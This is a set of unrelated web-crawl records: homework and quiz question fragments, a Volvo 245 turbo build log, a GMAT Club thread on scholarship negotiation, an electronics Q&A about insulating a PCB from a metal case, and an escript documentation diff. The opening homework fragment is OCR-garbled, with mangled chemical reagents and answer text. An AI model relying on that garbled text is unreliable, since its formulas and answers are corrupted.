context of the Leadership Grid, the __desires tight control in... Question 10 2 pts In the context of the Leadership Grid, the __desires tight control in order to get tasks done efficiently and considers creativity and human relations unnecessary. authority-compliance manager country club manager impoverished manager organization man manager... ##### 3. +-16.66 points ASWSBE13 12.E.013 My Notes Ask Your Teacher You may need to use the... 3. +-16.66 points ASWSBE13 12.E.013 My Notes Ask Your Teacher You may need to use the appropriate technology to answer this question Health insurance benefits vary by the size of the company. The sample data below show the number of companies providing health insurance for small, medium, and large c... ##### Supply the starting material(s reagent(s) or product(s) for the following transformations: (2 pts. each)dilule NaOCHz CH;OHheatdilute NaOCHz: CH;OHNaOEt; EtOH 2. H3O+NHzNOz1, HN(CHal? PH 4 -3.HzOtDraw stepwise synthesis for the following from the SMs provided as your only source of carbon: (2 pts )OHH3COOCHa Supply the starting material(s reagent(s) or product(s) for the following transformations: (2 pts. each) dilule NaOCHz CH;OH heat dilute NaOCHz: CH;OH NaOEt; EtOH 2. H3O+ NHz NOz 1, HN(CHal? PH 4 - 3.HzOt Draw stepwise synthesis for the following from the SMs provided as your only source of carbon:... Enterad Answer Praview Rasult Massage Your answer Isn t an Impllclt plane (it looks Ilke real number) incciect Tne answer aove NOT conect: point) An implicit equation for the plane passing Ihrough the points 3,0,2), (-3,4,2),ana (0,_ 3,5) Is Preview My Answers Submit Answers Your score was recorded ...
2022-05-16 15:52:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5831393003463745, "perplexity": 2780.0336730181443}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662510138.6/warc/CC-MAIN-20220516140911-20220516170911-00181.warc.gz"}
https://forrestbourke.com/turbo.html
## Installing a Junkyard Turbo in my 1984 Volvo 245 Latest Update: 7/1/20 # Intro This is a build log that will explain how I added a turbocharger to my existing engine. I will include what I've spent on parts, identify mistakes to avoid, and hopefully provide a comprehensive guide for anyone planning a similar project. ###### Note: Amazon links are affiliate links. Other sites are not. I've only linked things I've actually bought and used myself. All of the Amazon links donate 0.5% of the purchase price to the charity of your choice through Amazon Smile. If you haven't signed up, it'll ask you to pick a charity before redirecting you to the product. Neither of these features changes the price you pay. ## B23 Engine with a B230 Turbo We started the turbo build at 300,500 miles on the car. As far as I know, this is the original engine, a 1984 B23F (Wikipedia Link). Since the car came with Volvo's M46 manual transmission, the compression should be 9.5:1 and the stock power and torque numbers would've been 113hp at 5400 RPM and 136 ft-lbs at 2750 RPM. As far as I know, 1983 and 1984 were the only two years Volvo used Bosch LH2.0 fuel injection, switching to LH2.2 and then LH2.4 in the latter years of the 240. 1984 was also the last year before Volvo switched to the B230, featuring slightly different internals. I'm far from an expert, just summarizing info from around the web. I bought the car in 2018 with 282,000 miles, and the 18k we've put on it since have certainly not been easy miles. Prior to the turbo, it wasn't fast enough to get out of its own way. It wasn't powerful out of the factory, and the 300k miles after that certainly didn't increase the power. What sealed the deal on adding the turbo was struggling to get up hills off-road in Baja — we had the clearance, we just didn't have the power to make it up the steeper hills (Note: we could've also fixed this with lower rear end gearing, a lower first gear in the transmission, or an add-on transfer case, but a turbo seemed like the easiest, cheapest, and most well-traveled path). The turbo journey started on July 4th, 2019. Hans, an excellent friend and accomplished amateur mechanic, accompanied me to the Tumwater, WA junkyard to pull a turbo from a Volvo 740 turbo. Pick-n-Pull is spotty about labeling turbo models, so I made sure to check the VIN before driving out to the junkyard. This was actually my second try at finding a junkyard turbo. Some Thursday in March, I called another Pick-n-Pull about a turbo Volvo and confirmed hadn't been crushed — but by the time I got there on Saturday, the top had been crushed/cut off and the car was used as a bin for other trash. In addition to talking to friends and the Turbobricks Facebook group, this Turbobricks post by 740atl was incredibly helpful. I'd advise reading that post all the way through several times before embarking on this journey. If for whatever reason that thread is down, here is a PDF Link. #### Disappointment This car had been completely mined for parts. The only potentially useful part was an intercooler pipe, but I left it behind, I figured I could get the whole setup at once. Special shout-out to the employee in the picture above. who yelled at me for climbing into the area with said crushed car to look for parts, where I wasn’t supposed to be. The second Pick-n-Pull trip in July was much more successful. I nervously opened the hood of this second Volvo 740 turbo to find an untouched engine. Success at last! #### Success! Hans and I proceeded to pull the following from the donor 740: • Turbo, including the attached exhaust manifold, downpipe, oil hard lines, coolant hard lines • Intercooler and associated hard & soft piping • Oil cooler and input fittings, cutting the hoses. This was a mistake, as I detail later on – I should've taken the oil cooler, hoses, and the oil filter adapter plate from the donor car. • Fuel rail and fuel injectors (we ended up not needing the latter, as explained below I used high impedance injectors which make it easier to wire) • LH2.4 Fuel Computer and EZK Ignition Computer. We used neither, changing an early engine to LH2.4 is daunting because adding a crank position sensor requires drilling and tapping holes in the engine block. We didn't pull the oil cooling adapter/oil filter relocation because I didn't know how easy it was to remove from the car. This was again, a mistake. The total cost for the parts from Pick-n-Pull was $250 including about$50 core charges (none of which I got back), because we went on the 4th of July, which was a half-off day. A "normal" day, the parts would've been $500. In my opinion, that's a bit steep for junkyard turbo parts off of a 233k mile car - we could've gotten the price down a bit by being smarter with the things we got, i.e. getting fewer things and getting more of the things we needed, but going on a 50% off day was key. #### Oil cooler adapter We left this behind from the donor car, but that was a mistake. #### Remember not to start the car without oil # Mechanical Bits ## Oil Drain For the oil drain, I bought a kit on eBay called MAMBA Turbo Oil Feed & Return Drain Line Kit For VOLVO 740 940 TD04H-13C 49189 for$75. It came via incredibly fast DHL shipping from Taiwan (2 days) — I've had parts take longer to come from California. As it turns out, this kit was a poor choice for my application. I wasn't able to use the drain line at all because it was intended for a stock turbo block with the drain press fit using an o-ring seal (I gave the drain line away). My 1984 B23F block didn't have the oil drain hole or the casting to drill a hole. Even if it did have the casting, I wasn't interested in drilling the block — attempting to clean the chips out of the crankcase seemed like a recipe for disaster. The parts that I was able to use from the kit were the 10-AN flange for the turbo oil drain, and the banjo bolt and 4-AN oil feed line (described in the next section). I got a 10-AN bulkhead fitting from Amazon and used a step drill to make a hole in the oil pan below the baffles. As it turned out, I chose a bad place to make the hole. #### Don't put the fitting here The fitting interfered with the cover that installs between the engine and the transmission. I'm not sure if this is M46-only, and it looks like we might have been able to leave the cover off, but I chose to cut a notch to avoid the fitting. If you're smarter than me, you'll drill the hole a few inches forward so that it doesn't interfere with the transmission cover. Removing the oil pan was a real pain. We ended up disconnecting the subframe via the two bolts on either side (using long extensions for the ones under the brake master cylinder) and then jacking the engine up on the crank pulley and putting blocks between the cross-member and the frame. It was a little sketchy, but we got the pan out eventually. We broke off about two inches of the rubber hose next to the oil pickup, I didn't bother replacing it at the time, but I've since replaced it when I fixed the leaky bulkhead fitting. It would be wise to pick up this drain hose when you're working with the oil pan off. Mine was very crusty after 30 years and would've been next to impossible to remove without access from the bottom. ## Oil Feed For the oil feed, on the turbo side, I used the banjo bolt and hose from the eBay MAMBA kit. On the block side, I used a -4AN to 1/8 NPT fitting to first adapt the feed line and then a 1/8 NPT brass tee to keep the stock oil pressure sensor. Clocking this tee fitting carefully was needed to clear the oil filter sandwich plate and the alternator. I had to screw the tee into the block and then the oil pressure sender into the tee — when I first installed it, the assembly spewed a puddle of oil under the car because I didn't tighten it or install the pipe tape properly. All the NPT fittings need pipe tape, but the AN fittings seal with the flare and don't need tape. B23 blocks like mine have a 1/8 NPT oil pressure sensor feed, but B230 and other blocks might have different fitting sizes. ## Oil Cooler Don't set up the oil cooler the same way I did. The stock 740 turbo setup has an oil filter adapter that moves the oil filter towards the back of the car and hard lines that run forwards towards the oil cooler and then midway become crimped-on rubber hoses into right angle fittings in the oil cooler. At the junkyard, I cut the rubber hoses above the fittings on the oil cooler side from the donor car. Instead, either remove the oil filter adapter, hard lines/flex hose assemblies, and oil cooler from the donor car as an entire system or use an aftermarket sandwich plate plus an aftermarket oil cooler. I didn't do either of these. I used 1. : I used an aftermarket sandwich plate ($15 on eBay, they come in several colors) 2. "Evil Energy" brand nylon 10-AN hose and fittings, from Amazon. I was dumb and bought a 10ft kit and then a 16ft kit, because I ran out of fittings. Note: these were all 10AN kits with black and red fittings when I bought them, but it looks like some of them have changed to black/black fittings, and not all of them have 10AN in stock. Don't follow the links blindly since Amazon 3rd party sellers and Amazon itself changes inventory all the time; make sure you're getting the right hose. 3. and the stock oil cooler. The stock oil cooler uses arcane fittings called 1/2" BSP. I was unable to find 1/2" BSP to -10AN adapters, so I had to stack two adapters, first 1/2" BSP to 1/2" NPT and then 1/2" NPT to -10AN. 4. #### I really wouldn't recommend doing this Also this picture is wrong because the NPT to NPT connection in the middle needs pipe tape. This whole stack is really dumb, and I wouldn't recommend doing this at all. The stack of fittings alone cost$35 total, which is almost enough to get an aftermarket 10AN Oil Cooler. There are kits that have the hoses, fittings, sandwich plate, and oil cooler all together. To mount the oil cooler, I took off all the stock mounting brackets and just bolted it a few inches behind the grill. I can't comment on cooling performance because I haven't had the car in any temperature stressing situations and I haven't installed an oil temperature gauge. I'll install an eBay one soon using the two ports in the aftermarket oil filter sandwich plate. These ports were not on the stock filter adapter, so I suppose that's one advantage of using an aftermarket sandwich plate instead of the stock filter relocation adapter. One other potential advantage is being able to use the ports on the sandwich plate for the feed line into the turbo, but I found the routing was easier from the oil pressure sensor port. ## Coolant Feed The coolant for the turbo feeds in from the lower radiator hose to the bottom of the turbo and out the top of the turbo to the hose that goes to the bottom of the coolant overflow tank. This is to promote the thermal siphon effect—you can read more at Garrett's website. Luckily, Volvo 740 hoses work pretty well. The lower hose was about $19 and the upper hose was about$15. I grabbed these hoses from the donor car, but I figured it would be best to use new rubber since these hoses tend to crack eventually. Installing the hoses was a little tricky. I had to cut a few inches off the lower hose as well as the upper hose, and it's not totally obvious which direction the lower hose goes. In the photo, I had installed the hose backwards and consequently the feed to the turbo is kinked. It's not obvious (or at least it wasn't to me), but the feed to the turbo points down before curving around and going to the hardline coming out of the turbo. I had flip the lower radiator hose a few times and cut an inch or two off the end of the feed line as well to get everything to mate up. The upper feed line was fairly easy to attach, but I switched from the rectangular 240-style coolant overflow reservoir to the round 740-style coolant reservoir. I'd imagine it's possible to keep the original 240 tank, but that would leave less clearance for the MAF sensor and air filter. I removed the windshield wiper fluid tank as well, because it took up a ton of space where the air filter now sits. Eventually, I'll return my attention to the washer fluid and fit a smaller bottle, but it's not at the top of the priority list currently. ## Fuel Rail & Injectors Turbo cars and all LH2.4 cars use a 3bar (43 PSI) fuel pressure regulator. I believe LH2.2 and LH2.0 N/A cars used a 2.5bar regulator, as well as a different fuel rail for LH2.0. I replaced my original rail with the fuel rail from the donor car. It bolted right on to the manifold and the fitting for the fuel input from the filter fit. The only issue was that I had to fashion a sealing cap for the connection to the cold start injector, as my manifold doesn't have one. I replaced the fuel pressure regulator with a 3.0 bar regulator from eBay. Do not buy the one at this link. Mine failed after less than a month—fuel was pouring out of the vacuum port. For fuel injectors, I ordered a set of five from eBay, intended for an 850 turbo. These are high impedance injectors so they can be connected directly to the harness. One of the green injectors from the donor car was a bit melted (maybe a bad sign? or maybe that's why the car was in the junkyard in the first place?) so even if I had wanted to use those low impedance green injectors, I would've needed to get a new set in addition to the resistor pack. I kept all the green injectors from the junkyard car, but I should have tossed them back in the car and taken just the rail. I struggled for several weeks trying to figure out why my car would sometimes not start, why sometimes it would stumble, and why it would occasionally make "pops" going lean when held at 2000-3000 RPM. It turned out that the threads on the intake manifold that hold the fuel rail and the injector grounds were stripped, causing the ground to make intermittent connection. This was a really frustrating problem to troubleshoot, since it was so intermittent and felt like ECU or MAF sensor issues. #### Cold start injector cap I don't know the size of this fitting, but if I did it would be nice to put a fuel pressure sensor here. ## Intercooler, Radiator, and Electric Fan I used the junkyard intercooler and a new Nissens radiator from FCP Euro that had a built-in fan switch. Unfortunately, the fan switch was set at a higher temperature than the thermostat, so it pulsed the fan on and off as the car overheated. To resolve this, I wired the fan switch in parallel with a switch in the dash so the driver can force the fan on regardless of the temperature switch in the radiator. With the switch on the car seems to stay cool idling, but we haven't had it in hot weather. I've since changed to an adjustable fan thermostat that sticks into the vanes of the radiator. So far, it seems to be working well, though the way it's wired it will keep running the fan while the car is off until the radiator cools down. I'm not 100% sure what the model of e-fan is (I got it from a friend) but based on the size and the looks I think it's the 16-inch fan mentioned on Dave Barton's Electric Fan Page. I 3D printed little spacers to mount the fan on the radiator and drilled holes to match the radiator tabs. Unfortunately, I didn't pick up the turbo intercooler/radiator mounts from the junkyard car, so I put the stock rubber radiator mounts on the intercooler and bailing wired the radiator to the intercooler on the bottom, and "fabricated" steel mounts for the top that bolt into the original locations. My first set of 3D printed spacers wasn't tall enough, so the center of the fan chewed through the radiator and caused a leak. I replaced the radiator and printed longer spacers. After removing the mechanical fan and clutch, I replaced the studs in the water pump pulley with M6 bolts and washers to add a little clearance and remove the hand-shredding capability of the exposed pulley studs. ## Engine Control Unit (ECU) and Wiring Harness The ECU and harness caused a lot of problems. When I embarked on the project, I mistakenly thought that the car was LH2.2 and that a simple swap of the ECU, MAF, and injectors to LH2.2 turbo parts would work. This was wrong — my car was originally LH2.0, which has the same connectors for the MAF and computer as LH2.2, but not the same pinout, meaning any computer and any MAF can be plugged into any wiring harness, but only the correct ones will work together. We plugged in the new LH2.2 MAF and computer and immediately fried the computer — in fact, we did it twice and fried two computers. I'm lucky to have friends that swapped the LH2.2 harness with my stock LH2.0 harness while I was gone on vacation (they wanted me to stop complaining about my broken project). After the harness swap, we were finally able to get the car running. ## Ignition My car came from the factory with the Chrysler ignition system, using the computer with the vacuum line that sits on the washer fluid bottle. I swapped to a Bosch Breakerless ignition from an eighties 240 Turbo by replacing the distributor, coil, and computer. I pulled the EZK ignition computer from the donor car, but not the rest of the harness and system that I'd need to change my car to the EZK system. The Bosch Breakerless system was fairly easy to install, though I put it where the stock coil was (on the strut next to the battery) instead of where the harnessing emerged at the rear passenger side of the engine bay. The tachometer didn't work for a while because I hadn't realized that the signal wire emerged in this location. The solution was to run a tach wire from where the LH2.2 harness ended (near the wiper motor) over to the coil. ## MAF (Mass Air Flow) Sensor I used a junkyard LH2.2 MAF (whose part number ends in -007). I initially tried several MAFs, and only found success with the LH2.2 MAF. Though LH2.0, 2.2, and 2.4 have the same physical connector, they're not pin compatible and only work with their respective injection systems. The LH2.0 MAF has a metal body and case, whereas the LH2.2 and 2.4 MAFs have injection molded plastic cases. It's possible to distinguish the LH2.4 from the LH2.2 MAF because the latter has an adjustment/calibration screw. ## PCV System It took me a little while to figure out the PCV system, but it ended up being fairly easy. I used a rubber hose to connect the oil separator box (hidden under the intake manifold) to the turbo compressor inlet pipe. There's an orifice with a connector on it that accepts the hose. I'm told that the connector is for heating or atomizing the oil coming through the pipe, but I've yet to try connecting it. I first tried cleaning out my stock oil separator box, but they're cheap enough that replacement is the best option, especially if the intake manifold is off for another reason. ## Wideband O2 Sensor Even though I don't have huge tuning goals for this car, a wideband O2 sensor seemed like a good safety precaution and debugging tool. Knowing if the engine is running rich or lean is incredibly important for the first few runs of the engine, as well as later when trying to tune for the best performance. I bought an AEM wideband that came with a Bosch sensor and a weld-on bung. Since the 740 down-pipe had to be cut and welded shorter to clear the firewall, we used this opportunity to add the wideband bung. We positioned the wideband sensor about 12 inches down the pipe from the turbo. The narrowband sensor remained in the stock location, much closer to the turbo outlet. ## Exhaust I pieced together the exhaust from several junkyard exhausts. The stock 740 downpipe has a diameter of 2.25". We cut and shortened the flat section of the downpipe right after the turbo flange but about 1" so it would clear the firewall. For several months, I drove the car with no exhaust, just an open downpipe under the passenger floor. The open downpipe is fun for a week or two, but after a while wearing earplugs on the freeway gets annoying. I was lucky to find an over-axle 240 exhaust at Pick-N-Pull. I'm not sure if this was ever a stock option or if I was just lucky enough to find someone's custom exhaust. I decided to add a flex section after the downpipe because it seemed like a good idea—unfortunately, I misremembered the size of the downpipe and got 2.5" flex section instead of 2.25". I used a coupler to step up from the downpipe to the flex, and then another coupler to step down from the 2.5" flex section to the 1.875" stock exhaust. I used just the center muffler, since the turbo muffles some and I don't want the totally silent stock sound. Just the center muffler has a fairly conservative sound, I'd imagine running a straight pipe to the back of the car would have a more aggressive but not overly loud sound. I did notice a little less throttle responsiveness with the exhaust completed compared to the open downpipe—at some point I might install either an electric or a manual cutout before the muffler. The open downpipe is perfect for rallycross. #### Exhaust in the welding process Though it's been fixed now, we did have one serious problem (on the 2020 WA Gambler 500). The exhaust fell apart at the over-axle connection to the resonator, meaning the hot exhaust pointed directly at the fuel tank. The car would repeatedly quit running after a few minutes, especially while driving slowly. We don't have absolute proof this was the problem, but it seems likely that the exhaust and the hot weather contributed to vapor locking the motor. We cut the exhaust off during that event to get home (which did resolve the problem) and then welded it back on more securely after getting home. ## Vacuum Connections I wanted to make a log of all the vacuum connections, because it took me a little bit to figure out where to put them. There are connections before and after the throttle body, which see vacuum at different times, and the distinction is important for some of the connections. For example, if the turbo CBV is connected to the side before the throttle body, it won't function at all, since it won't see the vacuum in the manifold when the throttle is shut. Fun fact: while writing this section, I thought about how the vacuum advance is supposed to work and moved the vacuum advance from before the throttle body to after, using a tee from the fuel pressure regulator line. The car appears to idle a little better now. My exact setup is a little difficult because it never existed from the factory. Early 80s turbo 240s used the breakerless ignition but not LH2.2, and LH2.2 cars from the late 80s used EZK ignition. #### Before the Throttle Body • Charcoal Canister (two hoses) #### After the Throttle Body • Vacuum/Boost Gauge • Cabin HVAC Vacuum Line • Turbo CBV/Blow-off Valve • Fuel Pressure Regulator • Brake Booster # Reverse "Budget" Here's a rough accounting of all the parts I bought for this project. Item Cost Turbo, Manifold, Intercooler, Pipes, Oil Cooler, etc from Pick-N-Pull (50% off) $250 Bosch Breakerless Ignition, LH2.2 Harnesses, and Electric Fan from a friend$100 AEM Wideband O2 Sensor $162 Oil Pan Gasket$13 -10 AN Fittings and 10ft of nylon hose $82 Oil Feed and Drain Line Kit$80 Boost Gauge $15 Fuel Injectors$88 Exhaust Gaskets & Spark Plugs $17 BSP to AN Fitting Stack$35 Manual Boost Controller $15 Oil Sandwich Plate$17 740 Coolant Hoses with Lines for Turbo $30 -10 AN Fittings and 16ft of nylon hose (I should've gotten this kit from the beginning)$120 K&N Cone Air Filter $27 More Spark Plugs$10 3 Bar FPR $13 Fan Switch$10 Helicoil Kit (M8) $25 Bosch Narrowband O2 Sensor$75 Another 3 Bar FPR $25 New 740-style Coolant Reservoir$22 Nissens Radiator $127 Coolant Temp Gauge$27 Oil Temp Gauge \$12 # List of Mistakes Here are all the mistakes that we made that you should avoid making: • Not getting the entire factory oil cooler setup from the donor car • Not getting the radiator/intercooler bottom rubber mounts from the donor car • Not getting the coolant reservoir from the donor car • Cutting instead of unplugging the O2 sensor from the donor car • Assuming the car's existing harness was compatible with LH2.2 (really, the mistake here is that I didn't know there was a difference between LH2.0 and LH2.2) • Not using pipe tape on NPT fittings • Not checking the fuel injector grounds to the manifold • Not checking the fuel line for kinks • Not having the vacuum connections hooked up (or hooked up correctly) • Not capping the intake hose IAC port • Putting the ignition system in the wrong place, and not giving the fuel computer the tach (coil negative) input • Pointing the exhaust at the gas tank (accidentally)
2022-12-02 14:04:10
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3615134060382843, "perplexity": 2831.9049051375205}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710902.80/warc/CC-MAIN-20221202114800-20221202144800-00742.warc.gz"}
https://gmatclub.com/forum/negotiating-fellowship-strategies-150128.html
Check GMAT Club Decision Tracker for the Latest School Decision Releases https://gmatclub.com/AppTrack GMAT Club It is currently 27 Mar 2017, 03:44 GMAT Club Daily Prep Thank you for using the timer - this advanced tool can estimate your performance and suggest more practice questions. We have subscribed you to Daily Prep Questions via email. Customized for You we will pick new questions that match your level based on your Timer History Track every week, we’ll send you an estimated GMAT score based on your performance Practice Pays we will pick new questions that match your level based on your Timer History Events & Promotions Events & Promotions in June Open Detailed Calendar Negotiating fellowship strategies Author Message TAGS: Hide Tags Intern Joined: 17 Feb 2010 Posts: 17 GMAT 1: 760 Q49 V46 GPA: 3.47 WE: Other (Other) Followers: 2 Kudos [?]: 16 [0], given: 1 Show Tags 30 Mar 2013, 13:58 Has anyone had luck leveraging a scholarship from one school to get extra aid from another? I have a friend who was able to do this, but I'm wondering if others have and what their strategies were. Did you explicitly write to the office and mention another offer? Did you just ask for additional aid? I want to be very careful and not be too forceful - I am obviously very lucky to be in this situation. But if anyone has thoughts on this let me know. I'd especially like to hear from people who have tried to do this (successfully or otherwise). Manager Joined: 17 Jun 2012 Posts: 53 Location: United States Concentration: General Management, Strategy GMAT 1: 750 Q49 V42 GPA: 3.6 Followers: 0 Kudos [?]: 14 [0], given: 2 Show Tags 30 Mar 2013, 17:04 Interested in this as well because Anderson has offered me $but I'd like to head to Booth or SOM (no$ from either). I'm going to at least ask for a re-evaluation and it'd be great to hear some insights. Intern Joined: 10 Mar 2013 Posts: 25 Concentration: Entrepreneurship Followers: 0 Kudos [?]: 5 [0], given: 5 Show Tags 30 Mar 2013, 19:13 Re: Negotiating fellowship strategies   [#permalink] 30 Mar 2013, 19:13 Similar topics Replies Last post Similar Topics: 1 Negotiating MBA Scholarship Offer 6 11 Mar 2017, 18:36 Negotiate scholarship 3 01 May 2015, 05:03 Negotiating fellowship offers 1 24 Mar 2015, 13:31 2 How to negotiate an offer? 2 14 Mar 2014, 12:32 Negotiating Merit Scholarships 3 26 Feb 2014, 15:23 Display posts from previous: Sort by
2017-03-27 10:44:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2160712480545044, "perplexity": 8226.869056089945}, "config": {"markdown_headings": false, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-13/segments/1490218189471.55/warc/CC-MAIN-20170322212949-00309-ip-10-233-31-227.ec2.internal.warc.gz"}
http://electronics.stackexchange.com/questions/41867/thinest-insulator-between-metal-case-and-pcb
# Thinest insulator between metal case and PCB? For a miniature product, I want the smallest possible product enclosure around the PCB. I figure I can get away with a 1mm thick metal sheet enclosure. But I (probably) also need an insulator between the circuit board and the case, so nothing shorts out. What's the thinnest way I can make the inside of the metal case insulative? Paint? Powder coat? Paper? - What peak voltage (and max freq)? Any regulatory requirements? In what environment will it operate? – tyblu Sep 22 '12 at 4:58 5v USB used only occasionally. 3.3v logic. +/- 9v peak-to-peak low-current AC. --- FCC. --- Consumer electronics in everyday conditions; continental US. – EvolvedAI Sep 22 '12 at 5:24 (1 mm steel is thick!) The isolation may not be required, since you're probably (S)ELV. Anyway, it's not going to cost you much space-wise. I wouldn't mess with paint sprays and such. Agreed, it's the thinnest, but I assume you can afford the thickness of a 0.1 mm PP (PolyPropylene, PP has very low water absorption) sheet? Try to use only SMT parts, and mount them single-sided. PTH components will add at least 2 mm because of the pins sticking out at the other side. A single-sided PCB may be glued directly onto the PP sheet, which in turn you glue to the bottom of the enclosure. If you manage to do the wiring of the PCB single-sided as well you don't even need the PP insulation. It may be worth using a couple of 0 Ω jumpers to ease the layout. You can save an extra couple tenths of mm by using a 0.8 mm PCB instead of the standard 1.6 mm. The thinner PCB is less stiff, but at the small size it's not a problem, and when glued against the enclosure it won't get any mechanical strain anyway. - Thanks! So even if a +5v and a GND are touching the polypropylene 1 mm or 2 apart from each other, it always presents high resistance? – EvolvedAI Sep 22 '12 at 8:29 Is this the stuff? goodfellow.com/catalogue/… – EvolvedAI Sep 22 '12 at 8:30 @Evolved - Yep, that's the one. It mentions a roll width of 650 mm, though, and a roll may be 600 m worth (mine is), so that may be, er, somewhat much. You may ask them for a sample. The PP has a volumetric resistivity of > 10$^{15}$, which is, er, pretty high. At these low voltages you're absolutely safe. – stevenvh Sep 22 '12 at 8:47 For playing (and better) "Mylar" [tm][literally] will do what you want as long as you do not mechanically puncture it. OHP (remember them) projection film is/was usually Mylar. That's a version of Polyester but is going to behave well enough for what you want. – Russell McMahon Sep 22 '12 at 11:06 @Russell - I guess a lot of plastics will be suitable, but I'm not a mechanical engineer, nor a chemical one, so I don't know them all. I do know that PP has about the lowest water absorption, and a high resistivity (I forgot the dimension ohm.cm in my previous comment). – stevenvh Sep 22 '12 at 11:35
2013-05-23 19:05:49
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.552327573299408, "perplexity": 2243.3785961044073}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2013-20/segments/1368703682988/warc/CC-MAIN-20130516112802-00051-ip-10-60-113-184.ec2.internal.warc.gz"}
https://svn.geocomp.uq.edu.au/escript/trunk/doc/cookbook/example01.tex?sortby=author&sortdir=down&r1=2800&r2=2801&pathrev=4103
# Diff of /trunk/doc/cookbook/example01.tex revision 2800 by ahallam, Wed Nov 25 05:01:43 2009 UTC revision 2801 by ahallam, Thu Dec 3 01:45:48 2009 UTC # Line 11  Line 11 11  %  % 12  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 13 14    We will start by examining a simple one dimensional heat diffusion example. This problem will provide a good launch pad to build our knowledge of \esc and demonstrate how to solve simple partial differential equations (PDEs)\footnote{Wikipedia provides an excellent and comprehensive introduction to \textit{Partial Differential Equations} \url{http://en.wikipedia.org/wiki/Partial_differential_equation}, however their relevance to \esc and implementation should become a clearer as we develop our understanding further into the cookbook.} 15 16  \section{One Dimensional Heat Diffusion in an Iron Rod}  \section{One Dimensional Heat Diffusion in an Iron Rod} 17  \sslist{onedheatdiff001.py and cblib.py}  \sslist{onedheatdiff001.py and cblib.py} 18  %\label{Sec:1DHDv0}  %\label{Sec:1DHDv0} 19  We will start by examining a simple one dimensional heat diffusion example. This problem will provide a good launch pad to build our knowledge of \esc and how to solve simple partial differential equations (PDEs)\footnote{Wikipedia provides an excellent and comprehensive introduction to \textit{Partial Differential Equations} \url{http://en.wikipedia.org/wiki/Partial_differential_equation}, however their relevance to \esc and implementation should become a clearer as we develop our understanding further into the cookbook.}  The first model consists of a simple cold iron bar at a constant temperature of zero \reffig{fig:onedhdmodel}. The bar is perfectly insulated on all sides with a heating element at one end. Intuition tells us that as heat is applied; energy will disperse along the bar via conduction. With time the bar will reach a constant temperature equivalent to that of the heat source. 20  \begin{figure}[h!]  \begin{figure}[h!] 21  \centerline{\includegraphics[width=4.in]{figures/onedheatdiff}}  \centerline{\includegraphics[width=4.in]{figures/onedheatdiff}} 22  \caption{One dimensional model of an Iron bar.}  \caption{One dimensional model of an Iron bar.} 23  \label{fig:onedhdmodel}  \label{fig:onedhdmodel} 24  \end{figure}  \end{figure} The first model consists of a simple cold iron bar at a constant temperature of zero \reffig{fig:onedhdmodel}. The bar is perfectly insulated on all sides with a heating element at one end. Intuition tells us that as heat is applied; energy will disperse along the bar via 